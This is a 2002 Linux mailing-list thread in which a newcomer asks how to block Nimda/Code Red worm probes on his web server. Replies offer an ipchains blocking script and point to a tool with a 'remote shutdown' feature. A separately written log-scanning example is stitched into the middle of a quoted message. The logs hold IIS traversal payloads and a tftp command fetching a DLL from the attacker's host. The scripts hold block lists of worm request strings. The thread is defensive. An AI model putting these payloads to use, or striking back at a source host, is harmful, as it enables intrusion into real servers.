Re: [newbie] Can't block dos attack
Many thanks for the info.

Hey, where did it talk about remote shutdown? I saw no such reference. But I do like the auto-responder and e-mailing alerter. I'm trying to figure out how to make it work. I will e-mail again when I get some results, I'm still being hit and I don't know how to stop them.

__
Do You Yahoo!?
Yahoo! Health - Feel better, live better
http://health.yahoo.com

Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com
[newbie] Can't block dos attack
I am getting strange hits to my web server, I don't like it and I wish to know how to stop them from slipping past my defenses. I try using ipchains, most addresses are blocked, but for reasons I can't figure out, this address 65.192.23.150 keeps showing up. I don't understand it, if ipchains, /etc/hosts.deny can't block it, what can? Do I send back a command to shut down their server? How do I get the point across?

65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - -
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - -
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+dir HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /scripts/httpodbc.dll HTTP/1.0 404 307 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+dir HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/httpodbc.dll HTTP/1.0 404 305 - -
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - -
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - -
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - -
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - -
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - -
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
Re: [newbie] Can't block dos attack
Try the script below, which should take care of the problem. Of course, this isn't a dos attack, it's a virus attack (one of the viruses going around attempting to infect an iis server). Which kernel are you using? If it's 2.4.x, iptables is the way to block things out. (in that case let me know, and I'll adapt this to deal with iptables).

Michael

-- Begin Script --
#!/bin/sh
#
# Block sites which originate Nimda queries from Apache server
# Apache must be configured with HostnameLookups Off
# Adapted from an earlier script found on one of the Mandrake lists
# Changes by Michael Viron
# Last Update: 2/20/2002

LOGS=/var/log/httpd
# Change IP to reflect yours.
DESTINATION=192.168.1.1

# Hosts already blocked, one per line, so a host is only ever added once.
touch /var/tmp/blocked

cd $LOGS || exit 1

# block_pattern STRING
# Find every client address in the Apache logs that requested a URL
# containing STRING, add a DENY rule for it right away, and record the
# rule in /etc/ipchains.add so it can be made permanent below.
block_pattern()
{
    grep -h '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null \
      | awk -v pat="$1" 'index($0, pat) { print $1 }' \
      | sort -u \
      | while read host
    do
        if ! fgrep -x "$host" /var/tmp/blocked >/dev/null
        then
            echo "$host" >> /var/tmp/blocked
            /sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
            printf '%s\n' "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >> /etc/ipchains.add
        fi
    done
}

# Request strings left by the Nimda and Code Red worms.
block_pattern 'system32/cmd.exe'
block_pattern 'scripts/Admin.dll'
block_pattern 'MSADC/Admin.dll'
block_pattern 'scripts/root.exe'
block_pattern 'default.ida'

# Make the new rules permanent and reload the firewall.
if [ -f /etc/ipchains.add ]
then
    cat /etc/ipchains.add >> /etc/sysconfig/ipchains
    /etc/rc.d/init.d/ipchains restart
    rm -f /etc/ipchains.add
fi
-- End Script --

At 05:29 PM 7/28/2002 -0700, you wrote:
I am getting strange hits to my web server, I don't like it and I wish to know how to stop them from slipping past my defenses. I try using ipchains, most addresses are blocked, but for reasons I can't figure out, this address 65.192.23.150 keeps showing up. I don't understand it, if ipchains, /etc/hosts.deny can't block it, what can? Do I send back a command to shut down their server? How do I get the point across?

65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - -
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - -
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+dir HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /scripts/httpodbc.dll HTTP/1.0 404 307 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET
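As an added example (not Michael's script and not part of this thread), here is the same log-scanning idea written as a small POSIX sh tool that only prints the firewall rules instead of applying them, so the list can be looked over before it is loaded. It goes one step past the thread by emitting both the ipchains form used above and the iptables form Michael offers for 2.4.x kernels. The sample access log it writes is constructed here with RFC 5737 documentation addresses, and the function names (write_sample_log, worm_sources, worm_rules) are mine, not from any tool.

```shell
#!/bin/sh
# Added example, not the script posted in the thread.
# Scan an Apache access log for the worm-probe request signatures seen in
# the thread (Nimda / Code Red family) and print, rather than apply, the
# firewall rules that would block the sources.

# Write a constructed sample access log (RFC 5737 documentation addresses)
# to the path given as $1. The hostname line stands in for a log written
# with HostnameLookups On; worm_sources deliberately skips it.
write_sample_log() {
cat >"$1" <<'EOF'
203.0.113.7 - - [28/Jul/2002:17:50:05 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
203.0.113.7 - - [28/Jul/2002:18:01:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 87 "-" "-"
198.51.100.9 - - [28/Jul/2002:18:05:00 -0500] "GET /default.ida?XXXXXXXX HTTP/1.0" 404 300 "-" "-"
192.0.2.1 - - [28/Jul/2002:18:06:00 -0500] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
scanner.example.net - - [28/Jul/2002:18:07:00 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 87 "-" "-"
EOF
}

# Print the unique client addresses whose requests carry a probe signature.
# $1 = access log path. Only lines whose first field is a dotted-quad IP
# are considered, which is why the thread's script insists on
# HostnameLookups Off: a resolved hostname cannot be handed to the
# firewall as a source address.
worm_sources() {
    awk '$1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ &&
         /system32\/cmd\.exe|\/root\.exe|default\.ida|\/Admin\.dll/ { print $1 }' "$1" \
      | sort -u
}

# Print one firewall rule per offending source, without running it.
# $1 = access log path, $2 = "ipchains" or "iptables", $3 = this server's
# own address (the thread's DESTINATION).
worm_rules() {
    case "$2" in
        ipchains|iptables) ;;
        *) echo "worm_rules: unknown firewall '$2'" >&2; return 1 ;;
    esac
    worm_sources "$1" | while read -r host
    do
        if [ "$2" = ipchains ]; then
            echo "ipchains -I input -p tcp -s $host/32 -d $3 80 -j DENY"
        else
            echo "iptables -I INPUT -p tcp -s $host/32 -d $3 --dport 80 -j DROP"
        fi
    done
}

# Stand-alone demonstration on the constructed sample.
SAMPLE=$(mktemp)
write_sample_log "$SAMPLE"
worm_rules "$SAMPLE" iptables 192.0.2.10
rm -f "$SAMPLE"
```

Run on the sample it prints two iptables rules, one each for 198.51.100.9 and 203.0.113.7; the benign 192.0.2.1 request and the hostname line produce nothing. Pipe the output through review and then into sh once you are happy with it, or keep it as the audit record of what was blocked and why.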
Re: [newbie] Can't block dos attack
Ibly Piblo wrote:
I am getting strange hits to my web server, I don't like it and I wish to know how to stop them from slipping past my defenses. I try using ipchains, most addresses are blocked, but for reasons I can't figure out, this address 65.192.23.150 keeps showing up. I don't understand it, if ipchains, /etc/hosts.deny can't block it, what can? Do I send back a command to shut down their server? How do I get the point across?

65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - -
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - -
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+dir HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /scripts/httpodbc.dll HTTP/1.0 404 307 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+dir HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - -
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/httpodbc.dll HTTP/1.0 404 305 - -
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - -
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - -
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - -
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - -
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - -
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - -
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - -
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - -
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 -

That is no DoS attack--tis the wailing of IIS infected trying to spread its misery.

Go here... Tis time to meet a friend.
http://pfortin.com/Linux/MSVTS/

And yes the remote shutdown is there.

While you are at it, you might want to make some more new friends
http://plf.zarb.org

Civileme